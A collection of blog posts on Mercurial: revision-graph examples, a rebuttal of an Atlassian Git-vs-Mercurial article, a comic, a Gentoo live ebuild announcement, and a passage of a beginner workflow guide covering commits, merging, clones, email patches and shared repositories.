| o |  changeset:   2:b500d0a90d40
| |/   parent:      0:385d95ab1fea
| |    user:        Arne Babenhauserheide <bab@draketo.de>
| |    date:        Tue Aug 14 15:09:39 2012 +0200
| |    summary:     3
| |
o |  changeset:   1:8cc66166edc9
|/   user:        Arne Babenhauserheide <bab@draketo.de>
|    date:        Tue Aug 14 15:09:38 2012 +0200
|    summary:     2
|
o  changeset:   0:385d95ab1fea
   user:        Arne Babenhauserheide <bab@draketo.de>
   date:        Tue Aug 14 15:09:38 2012 +0200
   summary:     1

Even shorter, but not quite correct

The shortest representation is without the heads, though. It does not represent the current state of development if the last commit was a merge or if some branches were not merged. Otherwise it is equivalent.

$ hg log -Gr "(all() - merge())"

o  changeset:   3:55ba56aa8299
|  parent:      0:385d95ab1fea
|  user:        Arne Babenhauserheide <bab@draketo.de>
|  date:        Tue Aug 14 15:09:40 2012 +0200
|  summary:     4
|
| o  changeset:   2:b500d0a90d40
|/   parent:      0:385d95ab1fea
|    user:        Arne Babenhauserheide <bab@draketo.de>
|    date:        Tue Aug 14 15:09:39 2012 +0200
|    summary:     3
|
| o  changeset:   1:8cc66166edc9
|/   user:        Arne Babenhauserheide <bab@draketo.de>
|    date:        Tue Aug 14 15:09:38 2012 +0200
|    summary:     2
|
o  changeset:   0:385d95ab1fea
   user:        Arne Babenhauserheide <bab@draketo.de>
   date:        Tue Aug 14 15:09:38 2012 +0200
   summary:     1

The basic log, for reference

The vanilla-log looks like this:

$ hg log -G

@    changeset:   7:52fe4a8ec3cc
|\   tag:         tip
| |  parent:      6:7d3026216270
| |  parent:      5:848c390645ac
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Tue Aug 14 15:09:54 2012 +0200
| |  summary:     merge
| |
| o    changeset:   6:7d3026216270
| |\   parent:      2:b500d0a90d40
| | |  parent:      4:8dbc55213c9f
| | |  user:        Arne Babenhauserheide <bab@draketo.de>
| | |  date:        Tue Aug 14 15:09:45 2012 +0200
| | |  summary:     merged 4
| | |
o | |  changeset:   5:848c390645ac
|\| |  parent:      3:55ba56aa8299
| | |  parent:      2:b500d0a90d40
| | |  user:        Arne Babenhauserheide <bab@draketo.de>
| | |  date:        Tue Aug 14 15:09:43 2012 +0200
| | |  summary:     merged 2
| | |
+---o  changeset:   4:8dbc55213c9f
| | |  parent:      3:55ba56aa8299
| | |  parent:      1:8cc66166edc9
| | |  user:        Arne Babenhauserheide <bab@draketo.de>
| | |  date:        Tue Aug 14 15:09:41 2012 +0200
| | |  summary:     merged 1
| | |
o | |  changeset:   3:55ba56aa8299
| | |  parent:      0:385d95ab1fea
| | |  user:        Arne Babenhauserheide <bab@draketo.de>
| | |  date:        Tue Aug 14 15:09:40 2012 +0200
| | |  summary:     4
| | |
| o |  changeset:   2:b500d0a90d40
|/ /   parent:      0:385d95ab1fea
| |    user:        Arne Babenhauserheide <bab@draketo.de>
| |    date:        Tue Aug 14 15:09:39 2012 +0200
| |    summary:     3
| |
| o  changeset:   1:8cc66166edc9
|/   user:        Arne Babenhauserheide <bab@draketo.de>
|    date:        Tue Aug 14 15:09:38 2012 +0200
|    summary:     2
|
o  changeset:   0:385d95ab1fea
   user:        Arne Babenhauserheide <bab@draketo.de>
   date:        Tue Aug 14 15:09:38 2012 +0200
   summary:     1

Creating the test repo

To create the test repo, I just used a few short loops in the shell:

hg init test ; cd test 
for i in 1 2 3 4; do echo $i > $i ; hg ci -Am "$i"; hg up -r -$i; done
for i in 1 2 3 4; do echo $i > $i ; hg ci -Am "$i"; hg up -r -$i; hg merge $i ; hg ci -m "merged $i"; done
for i in $(hg heads --template "{node} ") ; do hg merge $i ; hg ci -m "merge"; done

Better representations?

Do you have better representations for viewing convoluted history?

PS: Yes, you can rewrite history, but that’s a really bad idea if you have many people who closely interact and publish early and often.

Factual Errors in “Git vs Mercurial: Why Git?” -- and corrections shown by example

Update 2016: Instead of fixing the article, the Atlassian web workers removed the comments which point out the misinformation in the article. *sigh*

Summary:

In the Atlassian Blog, a Git proponent spread blatant misinformation which the Atlassian folks are leaving uncommented even though the falseness has been shown by multiple people and even in examples in the article itself.

The claims and corrections:

  • Claim: Git never loses unreferenced data. Mercurial needs special handling to retrieve unreferenced data. Reality: Due to automatic garbage collection, history editing in git unpredictably loses unreferenced history while Mercurial stores permanent backups which can be retrieved with core commands.
  • Claim: Only git branches are namespaced. Reality: Mercurial bookmarks are namespaced with bookmark@path, when there could be confusion. This is equivalent to git’s use of path/branch, but only used where it is needed, while git forces the user to always make that distinction.
  • Claim: Only git can provide a staging area. Reality: Activating the Mercurial Queues (mq) and record extensions provides a staging area like the git index — for those who want it.
  • Claim: Git is more powerful. Reality: Both have the same raw power (as proven by transparent access with Mercurial to Git repos via hg-git), but its “cuddly command line” gives Mercurial an efficiency during actual usage which most people do not find in Git.

2 years ago, Atlassian developer Charles O’Farrell published the article Git vs. Mercurial: Why Git? in which he claimed to show "the winning side of Git”. This article was part of the Dev Tools series at Atlassian and written as a reply to the article Why Mercurial?. It was spiced with so much misinformation about Mercurial (statements which were factually wrong) that the comments exploded right away. But the article was never corrected. Just now I was referred to the text again, and I decided to do what I should have done 2 years ago: Write an answer which debunks the myths.

“I also think that git isn’t the most beginner-friendly program. That’s why I’m only using its elementary features” — “I hear that from many git-users …” — part of the discussion which got me to write this article

Safer history and rewriting history with Git

Charles starts off by contradicting himself: He claims that git is safer, because it "actually never lets you change anything" - and goes on to explain that all unreferenced data can be garbage collected after 30 days. Since nowadays the git garbage collector runs automatically, all unreferenced changes are lost after approximately 30 days.

This obviously means that git does allow you to change something. That this change only becomes irreversible after 30 days is an implementation detail which you have to keep in mind if you want to be safe.1

He then goes on to say how this allows for easy history rewriting with the interactive rebase and correctly includes, that the histedit extension of Mercurial allows you to do the same. (He also mentions the Mercurial Queues Extension (mq), just to admit that it is not the equivalent of git rebase -i but instead provides a staging area for future commits).

Then he starts the FUD2: Since histedit stores its backup in an external file, he asks rhetorically what new commands he would have to learn to restore it.

Dear reader, what new command might be required to pull data out of a backup? Something like git ref? Something like git reflog to find it and then something else?

Turns out, this is as easy and consistent as most things in Mercurial: Backup bundles can be treated just like repositories: To restore the changes, simply use

hg pull backup.bundle

So, all FUD removed, his take on safer history and rewriting history is reduced to “in hg it’s different, and potentially confusing features are shipped as extensions. Recovering changes from backups is consistent with your day-to-day usage of hg”.

(note that the flexibility of hg also enables the creation of extensions like mutable hg which avoids all the potential race conditions with git rebase - even for code you share between repositories (which is a total no-go in git), with a safety net which warns you if you try to change published history; thanks to the core feature phases)

Branching

On branching Charles goes deep into misinformation: He wrote his article in the year 2012, when Mercurial had already provided named branches as well as anonymous branching for 6 years, and one year after bookmarks became a core feature in hg 1.8, and he kept talking about how Mercurial advised keeping one clone per branch, referencing a blog post which incorrectly assumed that the hg developers were using that workflow (obviously he did not bother to check that claim). Also he went on clamoring that bookmarks initially could not be pushed between repositories, and how they were added “due to popular demand”. The reality is that at some point a developer simply said “I’ll write that”, and within a few months he implemented the equivalent of git branches. Before that, no hg developer saw enough need for them to exert that effort, and today most still simply use named branches.

But obviously Charles could not imagine named branches to work, so he kept talking about how bookmarks do not have namespaces while git branches have them, and that this would create confusion. He showed the following example for git and Mercurial (shortened here):

* 9e4b1b8 (origin/master, origin/test) Remove unused variable
| * 565ad9c (HEAD, master) Added Hello example
|/
* 46f0ac9 Initial commit

and

o  changeset:   2:67deb4acba33
|  bookmark:    master@default
|  summary:     Third commit
|
| @  changeset:   1:2d479c025719
|/   bookmark:    master
|    summary:     Second commit
|
o  changeset:   0:e0e024ff06ad
   summary:     First commit

Then he asked: “would the real master branch please stand up?”

Let’s try to answer that:

Git: there is a commit marked as (origin/master, origin/test), and one marked as (HEAD, master). If you know that origin is the canonical remote repository in git, then you can guess, that the names prefixed with origin/ come from the remote repository.

Mercurial: There is a commit with the bookmark master@default and one with the bookmark master. When you know that default is the canonical remote repository in Mercurial, then you can guess, that the bookmark postfixed with @default comes from the remote repository.

But Charles concludes his example with the sentence: “Because there is no notion of namespaces, we have no way of knowing which bookmarks are local and which ones are remote, and depending on what we call them, we might start running into conflicts.”

And this is not only FUD, it is factually wrong and disproven in his own example. After this, I cannot understand how anyone could take his text seriously.

But he goes on.

Staging

His final misinformation is about the git index - a staging area for uncommitted changes. He correctly identifies the index as “one of the things that people either love or hate about Git”. As Mercurial cares a lot about giving newcomers a safe environment to work in, it ships this controversial feature as an extension and not as a core command.

Charles now claims that the equivalent of the git index is the record extension - and then complains that it does not imitate the index exactly, because it does not give a staging area but rather allows committing partial changes. Instead of now turning towards the Mercurial Queues Extension which he mentioned earlier as staging area for commits, he asserts that record cannot provide the same feature as git.

Not very surprisingly, when you have an extension to provide partial commits (record) and one to provide a staging area (mq), if you want both, you simply activate both extensions. When you do that, Mercurial offers the qrecord command which stores partial changes in the current staging area.
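
A rough sketch of how that looks in practice (both extensions ship with Mercurial; the patch name here is made up):

# in ~/.hgrc
[extensions]
record =
mq =

# then, in the repository
hg qrecord my-staged-changes  # interactively pick hunks into a new mq patch (the staging area)
hg qrefresh                   # fold further working directory changes into that patch
hg qfinish --applied          # turn the applied patches into regular, permanent commits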

Not mentioning this is simply a matter of not having done proper research for his article - and not updating the post means that he intentionally continues to spread misinformation.

Blame

The only thing he got right is that git blame is able to reconstruct copies of code from one file to another.

Mercurial provides this for renamed files, but not for directly copy-pasted lines. Analysis of the commits would naturally allow doing the same, and all the information for that is available, but this is not implemented yet. If people ask for it loud enough, it will only be a matter of time, though. As bookmarks showed, the Mercurial code base is clean enough that it suffices to have a single developer who steps up and creates an extension for this. If enough people use it, the extension can become a core feature later on.

Conclusion

“There is a reason why hg users tend to talk less about hg: There is no need to talk about it that much.” — Arne Babenhauserheide as answer to Why Mercurial?

Charles concludes with “Git means never having to say, you should have”, and “Mercurial feels like Git lite”. Since he obviously did not do his research on Mercurial while he took the time to acquire in-depth knowledge of git, it’s quite understandable that he thinks this. But it is no basis for writing an article - especially not for Atlassian, the most prominent Mercurial hosting provider since their acquisition of Bitbucket, which grew big as a pure Mercurial hoster and added git after being acquired by Atlassian.

He then manages to finish his article with one more unfounded smoke bomb: “The repository format drives what is possible with our DVCS tools, now and in the future.”

While this statement actually is true, in the context of git-vs-mercurial it is a horrible misfit: The hg-git extension shows since 2009, 3 years before Charles wrote his article, that it is possible to convert transparently from git to Mercurial and back. So the repository format of Mercurial has all capabilities of the repository format of git - and since git cannot natively store named branches, represent branches with multiple heads or push changes into a checked out branch, the capabilities of the repository format of Mercurial are actually a superset of the capabilities of the storage format of Git.

But what he also states is that “there are more important things than having a cuddly command line”. And this is the final misleading statement to debunk: While the command line does not determine what is theoretically possible with the tool, it does determine what regular users can do with it. The horrible command line of git likely contributes to the many git users who never use anything but commit -a, push and pull - and to the proliferation of git gurus whom the normal users call when git shot them into their foot again.

It’s sad when someone uses his writing skills to wrap FUD and misinformation into pretty packaging to get people to take his side. Even more sad is, that this often works for quite some time and that few people read the comments section.3

And now that I finished debunking the article, there is one final thing I want to share. It is a quote from the discussion which prompted me to write this piece:

<…> btw. I also think that git isn’t the most beginner-friendly program.
<…> That’s why I’m only using its elementary features
<ArneBab> I hear that from many git-users…
<…> oh, maybe I should have another look at hg after all

This is a translation of the real quote in German:

<…> ich finde btw auch dass git nicht gerade das anfängerfreundlichste programm ist
<…> darum nutze ich das auch nur recht rudimentär
<ArneBab> das höre ich von vielen git-Nutzern…
<…> oha. nagut, dann sollte ich mir hg vielleicht doch nochmal ansehen

Note: hg is short for Mercurial. It is how Mercurial is called on the command line.

Footnotes:

1

Garbage collection after 30 days means that you have to remember additional information while you work. And that is a problem: You waste resources which would be better spent on the code you write. A DVCS should be about having to remember less, because your DVCS keeps the state for you.

2

FUD means fear-uncertainty-doubt and is a pretty common technique used to discredit things when one has no real arguments: Instead of giving a clear argument which can be debunked, just make some vague hints that something might be wrong or that there might be some deficiency or danger. Most readers will never check this and so this establishes the notion that something IS wrong.

3

Lesson learned: If you take the time to debunk something in the comments, be sure to also write an article about it. Otherwise you might find the same misinformation still being spread 2 years later by the same people. When Atlassian bought Bitbucket, that essentially amounted to a hostile takeover of a Mercurial team by git-zealots. And they got away with this, because too few people called them up on it in public.

BitBucket got big on Mercurial — until they got bought by Atlassian

A comment on largefile support missing in BitBucket, despite being a much-requested feature since 2012.

Note that it’s not Atlassian which got big with Mercurial. It’s Bitbucket which got big with Mercurial, and it was later bought by Atlassian. Also Atlassian is still spreading lies about Mercurial in the Atlassian blog by hosting a guest entry by a git zealot which is filled with factual errors, some even disproven in the examples in the article. Despite being called out on that in public, they did not even see the need to add a note to that guest entry about misunderstanding by the author.

I asked their marketing team personally several times to correct this. I know they read it, because people I used to collaborate with work at the BitBucket Mercurial support.

Dear BitBucket, this is where you could be: Virtuos Games uses BitTorrentSync with Mercurial for game development using decentralized large asset storage.

I guess they show that there is room for a Mercurial hosting company. Maybe it will be kiln.

I’m sorry for the great Mercurial developers working at Atlassian to improve Mercurial support. I know you’re doing great work and I hope you will prove me wrong on this. But from the outside it seems like you’re being used to hide hostility by the parent company against the core part of their own product. “…we decided to collaborate with GitHub on building a standard for large file support” — seriously? There is already a standard for large file support which has been part of Mercurial core since 2011, and works almost seamlessly. It just needs support from BitBucket to be easier for BitBucket users.

This craziness is a new spin on never trust a company: never ever trust a zealot with a tool which helps “the other side”: They are prone to even put zeal over business. For everyone at BitBucket: If this isn’t a wakeup call, I don’t know what is.

And if you like Git and are happy for a competitor to get weakened: Do you really want your tool to win by spreading intentional misinformation? Wouldn’t you feel more at ease seeing your tool win by merit of better technology, not by buying companies which support other tools and then starving them down and forcing them to badmouth their own technology?

git vs. hg - offensive

In many discussions on DVCS over the years I have been fair, friendly and technical while receiving vitriol and misinformation and FUD. This strip visualizes the impression which stuck to my mind when speaking with casual git-users.

Update: I found a very calm discussion at a place where I did not expect it: reddit. I’m sorry to you, guys. Thank you for proving that a constructive discussion is possible from both sides! I hope that you are not among the ones offended by this strip.

To Hg-users: There are git users who really understand what they are doing and who stick to arguments and friendly competition. This comic arose from the many frustrating experiences with the many other git users. Please don’t let this strip trick you into going down to non-constructive arguments. Let’s stay friendly. I already feel slightly bad about this short move into competition-like visualization for a topic where I much prefer friendly, constructive discussions. But it sucks to see contributors stumble over git, so I think it was time for this.

»I also think that git isn’t the most beginner-friendly program. That’s why I’m using only its elementary features«

git vs. hg - offensive

To put the strip in words, let’s complete the quote:

»I also think that git isn’t the most beginner-friendly program.
That’s why I’m using only its elementary features«
<ArneBab> I hear that from many git-users…
»oh, maybe I should have another look at hg after all«

Why this?

Because there are far too many Git-Users who only dare using the most basic commands which makes git at best useless and at worst harmful.

This is not the fault of the users. It is the fault of the tool.

This strip is horrible!

If you are offended by this strip: You knew the title when you came here, right?

And if you are offended enough, that you want to make your own strip and set things right, go grab the source-file, fire up krita and go for it! This strip is free.1

Commentary

If you feel that this strip fits Mercurial and Git perfectly, keep in mind, that this is only one aspect of the situation, and that using Git is still much better than being forced to use centralized or proprietary version tracking (and people who survive the initial phase mostly unscarred can actually do the same with Git as they could with Mercurial).

And Mercurial also has its share of problems - even horrible ones (update 2014: These were fixed in version 3.0) - but compared to Git it is a wonder of usability.

And in case this strip does not apply to your usage of Git: there are far too many people whose experience it fits - and this should not be the case for the most widespread system for accessing the code of free software projects.

(and should this strip be completely unintelligible to you: curse a world in which the concept of monofilament whips isn’t mainstream ☺ — let’s get more people to play Shadowrun)

The way forward

So if you are one of the people, who mostly use commit, pull and push, and turn to a Git-Guru when things break, then you might want to kiss the Git-Guru goodbye and give Mercurial a try.

By the way: the extensions named in the Final Round are record, mutable and infocalypse: Select the changes to commit on a hunk-by-hunk base, change history with automatic conflict resolution (even for rebase) and collaborate anonymously over Freenet.

And if you are one of the Git Gurus who claim that squashing attacking Ninjas is only possible with Git, have a look what a Firefox-contributor and former long-term Git-User and a Facebook infrastructure developer have to say about this.


  1. All the graphics in this strip are available under free licenses: creative-commons attribution or GPLv3 or later — you decide which of those you use. If it is cc attribution, call me Arne Babenhauserheide and link to this article. You’ll find all the sources as well as some preliminary works and SVGs in git-vs-hg-offensive.tar_.gz or git-vs-hg-offensive.zip (whichever you prefer)


Attachments:
  git-vs-hg-offensive-purevector-retouch2.png (184.31 KB)
  git-vs-hg-offensive.tar_.gz (22.59 MB)
  git-vs-hg-offensive.zip (22.62 MB)
  git-vs-hg-offensive.png (185.98 KB)
  git-vs-hg-offensive-purevector-retouch2.kra (377.58 KB)
  git-vs-hg-offensive-thumb.jpg (11.3 KB)
  git-vs-hg-offensive-thumb-240x240.jpg (11.78 KB)

Gentoo live ebuild for Mercurial

We (nelchael and I) just finished a live ebuild for Mercurial which lets you conveniently track the main (mpm) repo of Mercurial in Gentoo.

To use the ebuild, just add

=dev-util/mercurial-9999 **  

to your package.keywords and emerge mercurial (again).

It took us a while since we had to revise the Mercurial eclass to always build Mercurial live packages from their Mercurial repository and nelchael took the chance to completely overhaul the eclass.

If you're interested in the details, please have a look at the ebuild and the eclass as well as the tracking bug.

To use the eclass in an ebuild, just add inherit mercurial at the beginning of the ebuild and set EHG_REPO_URI to the correct repository URI. If you need to share a single repository between several ebuilds, set EHG_PROJECT to the project name in all of them.
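
A minimal sketch of such a live ebuild (the package name, URI and metadata are made up for illustration; inherit mercurial, EHG_REPO_URI and EHG_PROJECT are the eclass parts described above):

# dev-util/example-9999.ebuild (hypothetical package)
inherit mercurial

DESCRIPTION="Example live package built from its upstream Mercurial repository"
HOMEPAGE="https://example.org"
EHG_REPO_URI="https://example.org/hg/example"
EHG_PROJECT="example"

LICENSE="GPL-2"
SLOT="0"
KEYWORDS=""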

Have fun with Mercurial!

Learning Mercurial in Workflows

The official workflow guide for Mercurial, mirrored from mercurial-scm.org/guide. License: GPLv2 or later.

It delves into nonlinear history and merging right from the beginning and uses only features you get without activating extensions. Due to this it offers efficient and safe workflows without danger of losing already committed work.

With Mercurial you can use a multitude of different workflows. This page shows some of them, including their use cases. It is intended to make it easy for beginners of version tracking to get going instantly and learn completely incrementally. It doesn't explain the concepts used, because there are already many other great resources doing that, for example the wiki and the hgbook.

If you want a more exhaustive tutorial with the basics, please have a look at the Tutorial in the Mercurial Wiki. For a really detailed and very nice to read description of Mercurial, please have a look at Mercurial: The Definitive Guide.

Note:

This guide doesn't require any prior knowledge of version control systems (though subversion users will likely feel at home quite quickly). Basic command line abilities are helpful, because we'll use the command line client.

Basic workflows

We go from simple to more complex workflows. Those further down build on previous workflows.

Log keeping

Use Case

The first workflow is also the easiest one: You want to use Mercurial to be able to look back when you did which changes.

This workflow only requires an installed Mercurial and write access to some file storage (you almost definitely have that :) ). It shows the basic techniques for more complex workflows.

Workflow

Prepare Mercurial

As first step, you should teach Mercurial your name. For that you open the file ~/.hgrc (or mercurial.ini in your home directory for Windows) with a text-editor and add the ui section (user interaction) with your username:

[ui]
username = Mr. Johnson <johnson@smith.com>

Initialize the project

Now you add a new folder in which you want to work:

$ hg init project

Add files and track them

$ cd project
$ (add files)
$ hg add
$ hg commit
(enter the commit message)

Note:

You can also go into an existing directory with files and init the repository there.

$ cd project
$ hg init

Alternatively you can add only specific files instead of all files in the directory. Mercurial will then track only these files and won't know about the others. The following tells mercurial to track all files whose names begin with "file0" as well as file10, file11 and file12.

$ hg add file0* file10 file11 file12

Save changes

$ (do some changes)

see which files changed, which have been added or removed, and which aren't tracked yet

$ hg status

see the exact changes

$ hg diff

commit the changes.

$ hg commit

now an editor pops up and asks you for a commit message. Upon saving and closing the editor, your changes have been stored by Mercurial.

Note:

You can also supply the commit message directly via hg commit -m 'MESSAGE'.

Move and copy files

When you copy or move files, you should tell Mercurial to do the copy or move for you, so it can track the relationship between the files.

Remember to commit after moving or copying. From the basic commands, only commit creates a new revision.

$ hg cp original copy
$ hg commit
(enter the commit message)
$ hg mv original target
$ hg commit
(enter the commit message)

Now you have two files, "copy" and "target", and Mercurial knows how they are related.

Note:

Should you forget to do the explicit copy or move, you can still tell Mercurial to detect the changes via hg addremove --similarity 100. Just use hg help addremove for details.
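
For example (a sketch with made-up file names):

$ mv original target
$ hg addremove --similarity 100
$ hg commit
(enter the commit message)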

Check your history

$ hg log

This prints a list of changesets along with their date, the user who committed them (you) and their commit message.

To see a certain revision, you can use the -r switch (--revision). To also see the diff of the displayed revisions, there's the -p switch (--patch)

$ hg log -p -r 3

Lone developer with nonlinear history

Use case

The second workflow is still very easy: You're a lone developer and you want to use Mercurial to keep track of your own changes.

It works just like the log keeping workflow, with the difference that you go back to earlier changes at times.

To start a new project, you initialize a repository, add your files and commit whenever you finished a part of your work.

Also you check your history from time to time to see how you progressed.

Workflow

Basics from log keeping

Init your project, add files, see changes and commit them.

$ hg init project
$ cd project
$ (add files)
$ hg add # tell Mercurial to track all files
$ (do some changes)
$ hg diff # see changes
$ hg commit # save changes
$ hg cp # copy files or folders
$ hg mv # move files or folders
$ hg log # see history

Seeing an earlier revision

Different from the log keeping workflow, you'll want to go back in history at times and do some changes directly there, for example because an earlier change introduced a bug and you want to fix it where it occurred.

To look at a previous version of your code, you can use update. Let's assume that you want to see revision 3.

$ hg update 3

Now your code is back at revision 3, the fourth commit (Mercurial starts counting at 0).
To check if you're really at that revision, you can use identify -n.

$ hg identify -n

Note:

identify without options gives you the short form of a unique revision ID. That ID is what Mercurial uses internally. If you tell someone about the version you updated to, you should use that ID, since the numbers can be different for other people. If you want to know the reasons behind that, please read up Mercurials [basic concepts]. When you're at the most recent revision, hg identify -n will return "-1".
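
A quick sketch of the difference (the example values are illustrative, yours will differ):

$ hg identify      # prints the short unique ID, for example 6c4b8a0e2f13
$ hg identify -n   # prints the local revision number, for example 3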

To update to the most recent revision, you can use "tip" as revision name.

$ hg update tip

Note:

If at any place any command complains, your best bet is to read what it tells you and follow that advice.

Note:

Instead of hg update you can also use the shorthand hg up. Similarly you can abbreviate hg commit to hg ci.

Note:

To get a revision devoid of files, just update to "null" via hg update null. That's the revision before any files were added.

Fixing errors in earlier revisions

When you find a bug in some earlier revision you have two options: either you can fix it in the current code, or you can go back in history and fix the code exactly where you did it, which creates a cleaner history.

To do it the cleaner way, you first update to the old revision, fix the bug and commit it. Afterwards you merge this revision and commit the merge. Don't worry, though: Merging in mercurial is fast and painless, as you'll see in an instant.

Let's assume the bug was introduced in revision 3.

$ hg update 3
$ (fix the bug)
$ hg commit

Now the fix is already stored in history. We just need to merge it with the current version of your code.

$ hg merge

If there are conflicts use hg resolve - that's also what merge tells you to do in case of conflicts.

First list the files with conflicts

$ hg resolve --list

Then resolve them one by one. resolve attempts the merge again

$ hg resolve conflicting_file
(fix it by hand, if necessary)

Mark the fixed file as resolved

$ hg resolve --mark conflicting_file

Commit the merge, as soon as you resolved all conflicts. This step is also necessary when there were no conflicts!

$ hg commit

At this point, your fix is merged with all your other work, and you can just go on coding. Additionally the history shows clearly where you fixed the bug, so you'll always be able to check where the bug was.

Note:

Most merges will just work. You only need resolve, when merge complains.

So now you can initialize repositories, save changes, update to previous changes and develop in a nonlinear history by committing in earlier changesets and merging the changes into the current code.

Note:

If you fix a bug in an earlier revision, and some later revision copied or moved that file, the fix will be propagated to the target file(s) when you merge. This is the main reason why you should always use hg cp and hg mv.

Separate features

Use Case

At times you'll be working on several features in parallel. If you want to avoid mixing incomplete code versions, you can create clones of your local repository and work on each feature in its own code directory.

After finishing your feature you then pull it back into your main directory and merge the changes.

Workflow

Work in different clones

First create the feature clone and do some changes

$ hg clone project feature1
$ cd feature1
$ (do some changes and commits)

Now check what will come in when you pull from feature1, just like you can use diff before committing. The respective command for pulling is incoming

$ cd ../project
$ hg incoming ../feature1

Note:

If you want to see the diffs, you can use hg incoming --patch just as you can do with hg log --patch for the changes in the repository.

If you like the changes, you pull them into the project

$ hg pull ../feature1

Now you have the history of feature1 inside your project, but the changes aren't yet visible. Instead they are only stored inside a ".hg" directory of the project (more information on the store).

Note:

From now on we'll use the name "repository" for a directory which has a .hg directory with Mercurial history.

If you didn't do any changes in the project while you were working on feature1, you can just update to tip (hg update tip), but it is more likely that you'll have done some other changes in between. In that case, it's time for merging.

Merge feature1 into the project code

$ hg merge

If there are conflicts use hg resolve - that's also what merge tells you to do in case of conflicts. After you merge, you have to commit explicitly to make your merge final

$ hg commit
(enter commit message, for example "merged feature1")

You can create an arbitrary number of clones and also carry them around on USB sticks. Also you can use them to synchronize your files at home and at work, or between your desktop and your laptop.

Note:

You also have to commit after a merge when there are no conflicts, because merging creates new history and you might want to attach a specific message to the merge (like "merge feature1").

Rollback mistakes

Now you can work on different features in parallel, but from time to time a bad commit might sneak in. Naturally you could then just go back one revision and merge the stray error, keeping all mistakes out of the merged revision. However, there's an easier way, if you realize your error before you do another commit or pull: rollback.

Rolling back means undoing the last operation which added something to your history.

Imagine you just realized that you did a bad commit - for example you didn't see a spelling error in a label. To fix it you would use

hg rollback

And then redo the commit

hg commit -m "message"

If you can use the command history of your shell and you added the previous message via commit -m "message", that following commit just means two clicks on the arrow-key "up" and one click on "enter".

Though it changes your history, rolling back doesn't change your files. It only undoes the last addition to your history.

But beware that a rollback itself can't be undone. If you rollback and then forget to commit, you can't just say "give me my old commit back". You have to create a new commit.

Note:

Rollback is possible, because Mercurial uses transactions when recording changes, and you can use the transaction record to undo the last transaction. This means that you can also use rollback to undo your last pull, if you didn't yet commit anything new.
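
For example, if you just pulled from the wrong repository (a sketch):

$ hg pull ../feature1
(oops, that was the wrong repository)
$ hg rollback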

Sharing changes

Use Case

Now we go one step further: You are no longer alone, and you want to share your changes with others and include their changes.

The basic requirement for that is that you have to be able to see the changes of others.

Mercurial allows you to do that very easily by including a simple webserver from which you can pull changes just as you can pull changes from local clones.

Note:

There are a few other ways to share changes, though. Instead of using the builtin webserver, you can also send the changes by email or set up a shared repository to which you push changes instead of pulling them. We'll cover one of those later.

Workflow

Using the builtin webserver

This is the easiest way to quickly share changes.

First the one who wants to share his changes creates the webserver

$ hg serve

Now all others can point their browsers to his IP address (for example 192.168.178.100) at port 8000. They will then see all his history there and can decide if they want to pull his changes.

$ firefox http://192.168.178.100:8000

If they decide to include the changes, they just pull from the same URL

$ hg pull http://192.168.178.100:8000

At this point you all can work as if you had pulled from a local repository. All the data is now in your individual repositories and you can merge the changes and work with them without needing any connection to the served repository.

Sending changes by email

Often you won't have direct access to the repository of someone else, be it because he's behind a restrictive firewall, or because you live in different timezones. You might also want to keep your changes confidential and prefer internal email (if you want additional protection, you can also encrypt the emails, for example with GnuPG).

In that case, you can easily export your changes as patches and send them by email.

Another reason to send them by email can be that your policy requires manual review of the changes when the other developers are used to reading diffs in emails. I'm sure you can think of more reasons.

Sending the changes via email is pretty straightforward with Mercurial. You just export your changes and attach (or copy-paste) them in your email. Your colleagues can then just import them.

First check which changes you want to export

$ cd project
$ hg log

We assume that you want to export changeset 3 and 4

$ hg export 3 > change3.diff
$ hg export 4 > change4.diff

Now attach them to an email and your colleagues can just run import on both diffs to get your full changes, including your user information.

To be careful, they first clone their repository to have an integration directory as sandbox

$ hg clone project integration
$ cd integration
$ hg import change3.diff
$ hg import change4.diff

That's it. They can now test your changes in feature clones. If they accept them, they pull the changes into the main repository

$ cd ../project
$ hg pull ../integration

Note:

The patchbomb extension automates the email-sending, but you don't need it for this workflow.

Note:

You can also send around bundles, which are snippets of your actual history. Just create them via

$ hg bundle --base FIRST_REVISION_TO_BUNDLE changes.bundle

Others can then get your changes by simply pulling them, as if your bundle were an actual repository

$ hg pull path/to/changes.bundle

Using a shared repository

Sending changes by email might be the easiest way to reach people when you aren't yet part of the regular development team, but it creates additional workload: You have to bundle the changes, send mails and then import the bundles manually. Luckily there's an easier way which works quite well: The shared push repository.

Till now we transferred all changes either via email or via pull. Now we use another option: pushing. As the name suggests it's just the opposite of pulling: You push your changes into another repository.

But to make use of it, we first need something we can push to.

By default hg serve doesn't allow pushing, since that would be a major security hole. You can allow pushing in the server, but that's no solution when you live in different timezones, so we'll go with another approach here: Using a shared repository, either on an existing shared server or on a service like BitBucket. Doing so has a bit higher starting cost and takes a bit longer to explain, but it's well worth the effort spent.

If you want to use an existing shared server, you can use serve there and allow pushing. Also there are some other nice ways to allow pushing to a Mercurial repository, including simple access via SSH.
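
If you go that route, one way to allow pushing over plain HTTP is the following sketch (there is no authentication or encryption here, so only use it on a network you trust):

$ hg serve --config web.allow_push='*' --config web.push_ssl=False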

Otherwise you first need to set up a BitBucket account. Just sign up at BitBucket. After signing up (and logging in) hover your mouse over "Repositories". There click the item at the bottom of the opening dialog which says "Create new".

Give it a name and a description. If you want to keep it hidden from the public, select "private"

$ firefox http://bitbucket.org

Now your repository is created and you see instructions for pushing to it. For that you'll use a command similar to the following (just with a different URL)

$ hg push https://bitbucket.org/ArneBab/hello/

(Replace the URL with the URL of your created repository. If your username is "Foo" and your repository is named "bar", the URL will be https://bitbucket.org/Foo/bar/)

Mercurial will ask for your BitBucket name and password, then push your code.

Voilà, your code is online.

Note:

You can also use SSH for pushing to BitBucket.

Now it's time to tell all your colleagues to sign up at BitBucket, too.

After that you can click the "Admin" tab of your created repository and add the usernames of your colleagues on the right side under "Permission: Writers". Now they are allowed to push code to the repository.

(If you chose to make the repository private, you'll need to add them to "Permission: Readers", too)

If one of you now wants to publish changes, he'll simply push them to the repository, and all others get them by pulling.

Publish your changes

$ hg push https://bitbucket.org/ArneBab/hello/

Pull others' changes into your local repository

$ hg pull https://bitbucket.org/ArneBab/hello/

People who join you in development can also just clone this repository, as if one of you were using hg serve

$ hg clone https://bitbucket.org/ArneBab/hello/ hello

That local repository will automatically be configured to pull/push from/to the online repository, so new contributors can just use hg push and hg pull without an URL.
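
That default location is simply recorded in the clone's .hg/hgrc; for the example repository above it looks roughly like this:

[paths]
default = https://bitbucket.org/ArneBab/hello/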

Note:

